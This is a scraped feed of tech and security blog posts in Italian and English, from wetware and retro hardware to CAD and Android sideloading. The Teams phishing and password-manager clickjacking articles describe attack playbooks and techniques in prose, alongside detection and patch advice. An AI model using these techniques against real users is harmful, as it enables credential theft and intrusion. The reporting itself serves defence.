Tuttavia, le capacità dei sistemi di deep learning di ispirazione neurale dimostrano che possiamo svolgere molte attività utili di intelligenza artificiale emulando solo una piccola parte di quella complessità.
Il progresso delle Interfacce Neurali
I progressi nel software e nell’hardware neuromorfici possono sostituire l’uso del tessuto vivente effettivo per il calcolo, nello stesso modo in cui gli aerei a reazione hanno soppiantato la necessità di costruire ali che sbattono per poter realizzare cose che volano veloci.
ezstandalone.cmd.push(function () { ezstandalone.showAds(617); });
I ricercatori utilizzano interfacce neurali per studiare e influenzare il sistema nervoso nelle persone, negli animali e in vitro. Le interfacce neurali sono disponibili in due tipi: umani potenziati e computer potenziati.
Gli esseri umani potenziati con la tecnologia di interfaccia neurale compiono miracoli su base giornaliera: i sordi usano impianti cocleari per sentire, le persone con paraplegia usano stimolatori del midollo spinale per camminare e quelli con dolori e tremori usano stimolatori cerebrali profondi per sedare la loro sofferenza.
Ma il secondo tipo di interfaccia neurale – computer potenziati con neuroni viventi – è ancora una curiosità di laboratorio.
ezstandalone.cmd.push(function () { ezstandalone.showAds(618); });
Dal 1999, il laboratorio di Potter al Caltech e alla Georgia Tech University hanno sviluppato una tecnologia di interfaccia neurale open source, incluso NeuroRighter. Le interfacce neurali a circuito chiuso utilizzano la stimolazione elettrica e ottica per addestrare il tessuto cerebrale che cresce in una piastra di Petri.
Questo è stato un primo passo ma cruciale per creare utili sistemi di elaborazione ibrida. Sonostati pubblicati alcuni lavori dieci anni fa, ma da allora l’hardware che incorpora il wetware (neuroni viventi) non ha fatto grandi progressi. Le interfacce neurali elettriche odierne sono rudimentali. Mancano del feedback che è onnipresente nei sistemi nervosi e utilizzano solo pochi elettrodi con larghezza di banda limitata.
L'articolo Cos’è il Wetware: il futuro del potenziamento del cervello attraverso hardware e software proviene da il blog della sicurezza informatica.
CAD, From Scratch: MakerCAD
It’s likely that many of you use some form of CAD package, but how many of you have decided you didn’t like the software on offer? [Marcus Wu] did, and instead of griping, he wrote his own CAD software. It’s called MakerCAD, it’s published under an MIT licence, and you can try it yourself.
It’s written in Go, and it’s superficially similar to OpenSCAD in that the interface is through code. The similarity is skin deep though, as it provides the user with constraint solving as described in the video below the break.
As it stands it’s by no means feature complete, but it is now at a point at which it can be evaluated. Simple models can be created and exported as STEP files, so it can be used as a real-world CAD tool.
Whether it will flourish is down to the path it takes and how its community guides it. But we’re pleased to see any new open source projects in this space, which remains overly dominated by proprietary packages. If you try it, write up your experiences, we’d love to see how this develops.
youtube.com/embed/dFXxCYjCpHU?…
Phishing su Teams: almeno l’hacker risponde più veloce del vero help desk!
Negli ultimi mesi, come anticipato più volte su Red Hot Cyber, è emerso un nuovo fronte nello scenario del phishing aziendale: attacchi tramite Microsoft Teams in cui i malintenzionati si spacciano per personale IT o help desk. Approfittando delle funzionalità base della piattaforma, come la comunicazione esterna consentita per default, gli aggressori ingaggiano gli utenti con messaggi, chiamate o richieste di condivisione schermo, spesso inserendosi in modo insospettabile nella chat di Teams. L’efficacia di queste tattiche è cresciuta parallelamente all’adozione diffusa di Teams come strumento primario di lavoro collaborativo.
ezstandalone.cmd.push(function () { ezstandalone.showAds(604); });
I danni possono concretizzarsi quando la vittima, convinta di aiutare un tecnico interno, accede alla condivisione o all’uso di strumenti di controllo remoto (come Quick Assist, AnyDesk o strumenti RMM). Questo consente agli attaccanti di installare malware, compromettere endpoint, disabilitare protezioni e avanzare lateralmente nella rete aziendale. Una campagna, denominata VEILDrive, ha mostrato come l’attaccante abbia sfruttato un account precedentemente compromesso per inviare messaggi di phishing attraverso Teams e ottenere così l’accesso iniziale.
Un modus operandi frequentemente osservato prevede un’email bombing, ovvero un’inondazione di mail in breve tempo – anche migliaia in pochi minuti – per creare un senso d’urgenza e spingere le vittime a cercare aiuto tecnico.
ezstandalone.cmd.push(function () { ezstandalone.showAds(612); });
Gli aggressori sfruttano questo pretesto per contattarli via Teams. In questo contesto, le vittime ricevono messaggi da domini .onmicrosoft.com non verificati ma che includono parole come “helpdesk”, “IT” o “support”, aumentando il rischio di confusione.
Gli aggressori iniziano talvolta compromettendo account Teams interni o creando tenant Entra ID autonomi, spesso usando domini .onmicrosoft.com, soprattutto in assenza di configurazioni personalizzate. Le differenze tra account personali, licenze di prova e tenant aziendali influiscono poi sui log generati e sulle funzionalità disponibili.
Il phishing in chat one-to-one sfrutta la semplicità con cui, via Teams, si può cercare utenti esterni e inviare loro messaggi, abilità supportata dall’interfaccia della piattaforma. Anche se Microsoft attiva avvisi in caso di messaggi esterni o sospetti, questi possono essere aggirati in fasi successive dell’attacco.
ezstandalone.cmd.push(function () { ezstandalone.showAds(613); });
I log di Microsoft 365 offrono tracce importanti per l’investigazione: eventi come ChatCreated, MessageSent, UserAccepted e TeamsImpersonationDetected permettono di ricostruire le conversazioni sospette, identificare clic sugli avvisi di comunicazione esterna, e persino rilevare tentativi di impersonificazione.
In caso di chiamate vocali (vishing), Teams non mostra avvisi sul lato vittima e i log rimangono limitati, generando soltanto eventi come ChatCreated e MessageSent, rendendo difficile distinguere queste chiamate dalle chat testuali. Inoltre, la condivisione dello schermo può essere abilitata facilmente se l’utente ci casca, mentre il controllo remoto è bloccato di default ma può essere attivato tramite policy, aumentando la superficie di attacco.
Per contrastare questa minaccia, Team AXON propone una logica di rilevamento basata su UEBA, arricchita con scoring e contesto: vengono identificati chat esterni inusuali, domini .onmicrosoft.com, pattern con keyword sospette (es. helpdesk), uso di caratteri non-ASCII (emoji), e picchi di TIMailData legati a email bombing. L’analisi considera anche eventi come UserAccepted, risposte dell’utente, o l’aggiunta di membri ai thread
ezstandalone.cmd.push(function () { ezstandalone.showAds(614); });
Completano il quadro le soluzioni tecniche: l’impiego di un sistema di Endpoint Detection and Response (EDR) combinato con antivirus di nuova generazione (Next-Gen AV) è raccomandato. Questi strumenti possono bloccare comportamenti anomali, intercettare applicazioni malevole e sostenere le attività investigative post-evento.
L'articolo Phishing su Teams: almeno l’hacker risponde più veloce del vero help desk! proviene da il blog della sicurezza informatica.
Why Super Mario 64 Wastes So Much Memory
The Nintendo 64 was an amazing video game console, and alongside consoles like the Sony PlayStation, helped herald in the era of 3D games. That said, it was new hardware, with new development tools, and thus creating those early N64 games was a daunting task.In an in-depth review of Super Mario 64’s code, [Kaze Emanuar] goes over the curious and wasteful memory usage, mostly due to unused memory map sections, unoptimized math look-up tables and greedy asset loading.
The game as delivered in the Japanese and North-American markets also seems to have been a debug build, with unneeded code everywhere. That said, within the context of the three-year development cycle, it’s not bad at all — with twenty months spent by seven programmers on actual development for a system whose hardware and tooling were still being finalized, with few examples available of how to do aspects like level management, a virtual camera, etc. Over the years [Kaze] has probably spent more time combing over SM64‘s code than the original developers, as evidenced by his other videos.
As noted in the video, later N64 games like Legend of Zelda: Ocarina of Time are massively more optimized and streamlined, as lessons were learned and tooling improved. For the SM64 developers, however, they had a gargantuan 4 MB of fast RDRAM to work with, so optimization and memory management likely got kicked down to the bottom on the priority list. Considering the absolute smash hit that SM64 became, it seems that these priorities were indeed correct.
youtube.com/embed/oZcbgNdWL7w?…
Tefifon: Germany’s Tape-Shaped Record Format
Recently the [Our Own Devices] YouTube channel took a gander at the Tefifon audio format. This was an audio format that competed with shellac and vinyl records from the 1930s to the 1960s, when the company behind it went under. Some people may already know Tefifon as [Matt] from Techmoan has covered it multiple times, starting with a similar machine about ten years ago, all the way up to the Stereo Tefifon machine, which was the last gasp for the format.
There’s a lot to be said for the Tefifon concept, as it fixes many of the issues of shellac and vinyl records, including the limited run length and having the fragile grooves exposed to damage and dust. By having the grooves instead on a flexible band that got spooled inside a cartridge, they were protected, with up to four hours of music or eight hours of spoken content, i.e. audio books.
Although the plastic material used for Tefifon bands suffered from many of the same issues as the similar Dictabelt audio recording system, such as relatively rapid wear and degradation (stiffening) of the plastic, it was mostly the lack of interest from the audio labels that killed the format. With the big labels and thus big artists heavily invested in records, the Tefifon never really got any hits and saw little use outside of West Germany throughout the 1950s and 1960s before its last factories were shuttered.
youtube.com/embed/8Uoes4JXZeI?…
youtube.com/embed/nBNTAmLRmUg?…
Linear Actuators 101
Linear actuators are a great help when you’re moving something along a single axis, but with so many options, how do you decide? [Jeremy Fielding] walks us through some of the high level tradeoffs of using one type of actuator over another.
There are three main types of linear actuator available to the maker: hydraulic, pneumatic, and electric. Both the hydraulic and pneumatic types move a cylinder with an attached rod through a tube using pressure applied to either side of the cylinder. [Fielding] explains how the pushing force will be greater than the pulling force on these actuators since the rod reduces the available surface area on the cylinder when pulling the rod back into the actuator.
Electric actuators typically use an electric motor to drive a screw that moves the rod in and out. Unsurprisingly, the electric actuator is quieter and more precise than its fluid-driven counterparts. Pneumatic wins out when you want something fast and without a mess if a leak happens. Hydraulics can be driven to higher pressures and are typically best when power is the primary concern which is why we see them in construction equipment.
You can DIY your own linear actuators, we’ve seen tubular stepper motors, and even a linear actuator inspired by muscles.
youtube.com/embed/YzgFyO_W2nM?…
Animatronic Eyes Are Watching You
If you haven’t been following [Will Cogley]’s animatronic adventures on YouTube, you’re missing out. He’s got a good thing going, and the latest step is an adorable robot that tracks you with its own eyes.
Yes, the cameras are embedded inside the animatronic eyes.That was a lot easier than expected; rather than the redesign he was afraid of [Will] was able to route the camera cable through his existing animatronic mechanism, and only needed to hollow out the eyeball. The tiny camera’s aperture sits nigh-undetectable within the pupil.
On the software side, face tracking is provided by MediaPipe. It’s currently running on a laptop, but the plan is to embed a Raspberry Pi inside the robot at a later date. MediaPipe tracks any visible face and calculates the X and Y offset to direct the servos. With a dead zone at the center of the image and a little smoothing, the eye motion becomes uncannily natural. [Will] doesn’t say how he’s got it set up to handle more than one face; likely it will just stick with the first object identified.
Eyes aren’t much by themselves, so [Will] goes further by creating a little robot. The adorable head sits on a 3D-printed tapered roller bearing atop a very simple body. Another printed mechanism allows for pivot, and both axes are servo-controlled, bringing the total number of motors up to six. Tracking prefers eye motion, and the head pivots to follow to try and create a naturalistic motion. Judge for yourself how well it works in the video below. (Jump to 7:15 for the finished product.)
We’ve featured [Will]’s animatronic anatomy adventures before– everything from beating hearts, and full-motion bionic hands, to an earlier, camera-less iteration of the eyes in this project.
Don’t forget if you ever find yourself wading into the Uncanny Valley that you can tip us off to make sure everyone can share in the discomfort.
youtube.com/embed/IPBu5Q2aogE?…
I gestori di password più diffusi, tra cui LastPass, 1Password e Bitwarden sono vulnerabili al clickjacking
Un esperto di sicurezza ha scoperto che sei dei gestori di password più diffusi, utilizzati da decine di milioni di persone, sono vulnerabili al clickjacking, un fenomeno che consente agli aggressori di rubare credenziali di accesso, codici di autenticazione a due fattori e dati delle carte di credito.
ezstandalone.cmd.push(function () { ezstandalone.showAds(604); });
Il problema è stato segnalato per la prima volta dal ricercatore indipendente Marek Tóth, che ha presentato un rapporto sulle vulnerabilità alla recente conferenza di hacker DEF CON 33. Le sue scoperte sono state successivamente confermate dagli esperti di Socket, che hanno contribuito a informare i fornitori interessati e a coordinare la divulgazione pubblica delle vulnerabilità.
Ha testato il suo attacco su varianti specifiche di 1Password, Bitwarden, Enpass, iCloud Passwords, LastPass e LogMeOnce e ha scoperto che tutte le versioni del browser potevano far trapelare dati sensibili in determinati scenari.
ezstandalone.cmd.push(function () { ezstandalone.showAds(612); });
Gli aggressori possono sfruttare le vulnerabilità quando le vittime visitano pagine dannose o siti vulnerabili ad attacchi XSS o al cache poisoning. Di conseguenza, gli aggressori sono in grado di sovrapporre elementi HTML invisibili all’interfaccia del gestore delle password. L’utente penserà di interagire con innocui elementi cliccabili sulla pagina, ma in realtà attiverà il riempimento automatico, che “trapelerà” le sue informazioni riservate agli hacker.
L’attacco si basa sull’esecuzione di uno script su un sito web dannoso o compromesso. Questo script utilizza impostazioni di trasparenza, sovrapposizioni o eventi puntatore per nascondere il menu a discesa di compilazione automatica del gestore password del browser. Allo stesso tempo, l’aggressore sovrappone elementi falsi e fastidiosi alla pagina (come banner di cookie, pop-up o CAPTCHA). Tuttavia, i clic su questi elementi conducono a controlli nascosti del gestore delle password, che portano alla compilazione di moduli con informazioni riservate.
Ha dimostrato diversi sottotipi DOM e exploit dello stesso bug: manipolazione diretta dell’opacità dell’elemento DOM, manipolazione dell’opacità dell’elemento radice, manipolazione dell’opacità dell’elemento padre e sovrapposizione parziale o completa.
ezstandalone.cmd.push(function () { ezstandalone.showAds(613); });
Il ricercatore ha anche dimostrato l’utilizzo di un metodo in cui l’interfaccia utente segue il cursore del mouse e, di conseguenza, qualsiasi clic dell’utente, ovunque si trovi, attiva il riempimento automatico dei dati. Allo stesso tempo, Toth ha sottolineato che lo script dannoso può rilevare automaticamente il gestore di password attivo nel browser della vittima e quindi adattare l’attacco a un obiettivo specifico in tempo reale.
Di conseguenza, il ricercatore ha testato 11 gestori di password per individuare la vulnerabilità al clickjacking e ha scoperto che tutti erano vulnerabili ad almeno uno dei metodi di attacco. Sebbene Toth avesse informato tutti i produttori dei problemi già nell’aprile 2025 e li avesse anche avvisati che la divulgazione pubblica delle vulnerabilità era prevista per DEF CON 33, non ci fu alcuna risposta immediata. La scorsa settimana, Socket ha contattato nuovamente gli sviluppatori per ribadire la necessità di assegnare CVE ai problemi nei prodotti interessati.
I rappresentanti di 1Password hanno definito il rapporto del ricercatore “informativo”, sostenendo che il clickjacking è una minaccia comune da cui gli utenti dovrebbero essenzialmente proteggersi. Anche gli sviluppatori di LastPass hanno trovato il rapporto “informativo” e Bitwarden ha riconosciuto i problemi e, sebbene l’azienda non li abbia considerati gravi, le correzioni sono state implementate nella versione 2025.8.0, rilasciata la scorsa settimana. I seguenti gestori di password, che complessivamente contano circa 40 milioni di utenti, sono attualmente vulnerabili agli attacchi di clickjacking:
ezstandalone.cmd.push(function () { ezstandalone.showAds(614); });
- 1Password 8.11.4.27
- Bitwarden 2025.7.0
- Enpass 6.11.6 (correzione parziale implementata nella versione 6.11.4.2)ezstandalone.cmd.push(function () { ezstandalone.showAds(615); });
- Password iCloud 3.1.25
- LastPass 4.146.3
- LogMeOnce 7.12.4ezstandalone.cmd.push(function () { ezstandalone.showAds(616); });
Le patch sono già state implementate nei loro prodotti: Dashlane (v6.2531.1 rilasciata il 1° agosto), NordPass, ProtonPass, RoboForm e Keeper (17.2.0 rilasciata a luglio). Ora si consiglia agli utenti di assicurarsi di aver installato le versioni più recenti disponibili dei prodotti.
L'articolo I gestori di password più diffusi, tra cui LastPass, 1Password e Bitwarden sono vulnerabili al clickjacking proviene da il blog della sicurezza informatica.
PVDF: the Specialized Filament for Chemical and Moisture Resistance
There’s a dizzying number of specialist 3D printing materials out there, some of which do try to offer an alternative to PLA, PA6, ABS, etc., while others are happy to stay in their own niche. Polyvinylidene fluoride (PVDF) is one of these materials, with the [My Tech Fun] YouTube channel recently getting sent a spool of PVDF for testing, which retails for a cool $188.
Reading the specifications and datasheet for the filament over at the manufacturer’s website it’s pretty clear what the selling points are for this material are. For the chemists in the audience the addition of fluoride is probably a dead giveaway, as fluoride bonds in a material tend to be very stable. Hence PVDF ((C2H2F2)n) sees use in applications where strong resistance to aggressive chemicals as well as hydrolysis are a requirement, not to mention no hygroscopic inclinations, somewhat like PTFE and kin.
In the video’s mechanical testing it was therefore unsurprising that other than abrasion resistance it’s overall worse and more brittle than PA6 (nylon). It was also found that printing this material with two different FDM printers with the required bed temperature of 110°C was somewhat rough, with some warping and a wrecked engineering build plate in the Bambu Lab printer due to what appears to be an interaction with the usual glue stick material. Once you get the print settings dialed in it’s not too complicated, but it’s definitely not a filament for casual use.
youtube.com/embed/tYyk9kOpGOE?…
The Browser Wasn’t Enough, Google Wants to Control All Your Software
A few days ago we brought you word that Google was looking to crack down on “sideloaded” Android applications. That is, software packages installed from outside of the mobile operating system’s official repository. Unsurprisingly, a number of readers were outraged at the proposed changes. Android’s open nature, at least in comparison to other mobile operating systems, is what attracted many users to it in the first place. Seeing the platform slowly move towards its own walled garden approach is concerning, especially as it leaves the fate of popular services such as the F-Droid free and open source software (FOSS) repository in question.
But for those who’ve been keeping and eye out for such things, this latest move by Google to throw their weight around isn’t exactly unexpected. They had the goodwill of the community when they decided to develop an open source browser engine to keep the likes of Microsoft from taking over the Internet and dictating the rules, but now Google has arguably become exactly what they once set out to destroy.
Today they essentially control the Internet, at least as the average person sees it, they control 72% of the mobile phone OS market, and now they want to firm up their already outsized control which apps get installed on your phone. The only question is whether or not we let them get away with it.
Must be This High to Ride
First, “sideloading”. The way you’re supposed to install apps on your Android device is through the Google Play store, and maybe your phone manufacturer’s equivalent. All other sources are, by default, untrusted. What used to be refreshing about the Android ecosystem, at least in comparison, was how easy it was to sideload an application that didn’t come directly from, and profit, Big G. That is what’s changing.
Of course, the apologists will be quick to point out that Google isn’t taking away the ability to sideload applications on Android. At least, not on paper. What they’re actually doing is making it so sideloaded applications need to be from a verified developer. According to their blog post on the subject, they have no interest in the actual content of the apps in question, they just want to confirm a malicious actor didn’t develop it.
The blog post attempts to make a somewhat ill-conceived comparison between verifying developer identities with having your ID checked at the airport. They go on to say that they’re only interested in verifying each “passenger” is who they say they are for security purposes, and won’t be checking their “bags” to make sure there’s nothing troubling within. But in making this analogy Google surely realizes — though perhaps they hope the audience doesn’t pick up on — the fact that the people checking ID at the airport happen to wear the same uniforms as the ones who x-ray your bags and run you through the metal detector. The implication being that they believe checking the contents of each sideloaded package is within their authority, they have simply decided not to exercise that right. For now.
Conceptually, this initiative is not unlike another program Google announced this summer: OSS Rebuild. Citing the growing risk of supply chain attacks, where malicious code sneaks into a system thanks to the relatively lax security of online library repositories, the search giant offers a solution. They propose setting up a system by which they not only verify the authors of these open source libraries, but scan them to make sure the versions being installed match the published source code. In this way, you can tell that not only are you installing the authentic library, but that no rogue code has been added to your specific copy.
Google the Gatekeeper
Much like verifying the developer of sideloaded applications, OSS Rebuild might seem like something that would benefit users at first glance. Indeed, there’s a case to be made that both programs will likely identify some low-hanging digital fruit before it has the chance to cause problems. An event that you can be sure Google will publicize for all it’s worth.
But in both cases, the real concern is that of authority. If Google gets to decide who a verified developer is for Android, then they ultimately have the power to block whatever packages they don’t like. To go back to their own airport security comparison, it would be like if the people doing the ID checks weren’t an independent security force, but instead representatives of a rival airline. Sure they would do their duty most of the time, but could they be trusted to do the right thing when it might be in their financial interests not to? Will Google be able to avoid the temptation to say that the developers of alternative software repositories are persona non grata?
Even more concerning, who do you appeal to if Google has decided they don’t want you in their ecosystem? We’ve seen how they treat YouTube users that have earned their ire for some reason or another. Can developers expect the same treatment should they make some operational faux pas?
Let us further imagine that verification through OSS Rebuild becomes a necessary “Seal of Approval” to be taken seriously in the open source world — at least in the eyes of the bean counters and decision makers. Given Google’s clout, it’s not hard to picture such an eventuality. All Google would have to do to keep a particular service or library down is elect not to include them in the verification process.
Life Finds a Way
If we’ve learned anything about Google over the years, it’s that they can be exceptionally mercurial. They’re quick to drop a project and change course if it seems like it isn’t taking them where they want to go. Even projects that at one time seemed like they were going to be a pivotal part of the company’s future — such as Google+ — can be kicked to the curb unceremoniously if the math doesn’t look right to them. Indeed, the graveyard of failed Google initiatives has far more headstones than the company’s current roster of offerings.
Which is so say, that there’s every possibility that user reaction to this news might be enough to get Google to take a different tack. Verified sideloading isn’t slated to go live until 2027 for most of the world, although some territories will get it earlier, and a lot can happen between now and then.
Even if Google goes through with it, they’ve already offered something of an olive branch. The blog post mentions that they intend to develop a carve out in the system that will allow students and hobbyists to install their own self-developed applications. Depending on what that looks like, this whole debate could be moot, at least for folks like us.
In either event, the path would seem clear. If we want to make sure there’s choice when it comes to Android software, the community needs to make noise about the issue and keep the pressure on. Google’s big, but we’re bigger.
Receiving Radio Signals from Space Like It’s 1994
For certain situations, older hardware is preferred or even needed to accomplish a task. This is common in industrial applications where old machinery might not be supported by modern hardware or software. Even in these situations though, we have the benefit of modern technology and the Internet to get these systems up and running again. [Old Computers Sucked] is not only building a mid-90s system to receive NOAA satellite imagery, he’s doing it only with tools and equipment available to someone from this era.
Of course the first step here is to set up a computer and the relevant software that an amateur radio operator would have had access to in 1994. [Old Computers Sucked] already had the computer, so he turned to JV-FAX for software. This tool can decode the APT encoding used by some NOAA satellites without immediately filling his 2 MB hard drive, so with that out of the way he starts on building the radio.
In the end, [Old Computers Sucked] was able to receive portions of imagery from weather satellites still using the analog FM signals from days of yore, but there are a few problems with his build that are keeping him from seeing perfectly clear imagery. He’s not exactly sure what’s wrong but he suspects its with the hardware digitizer as it was behaving erratically earlier in the build. We admire his dedication to the time period, though, down to almost every detail of the build. It reminds us of [saveitforparts]’s effort to get an 80s satellite internet experience a little while back.
youtube.com/embed/xVsBt21cs8Q?…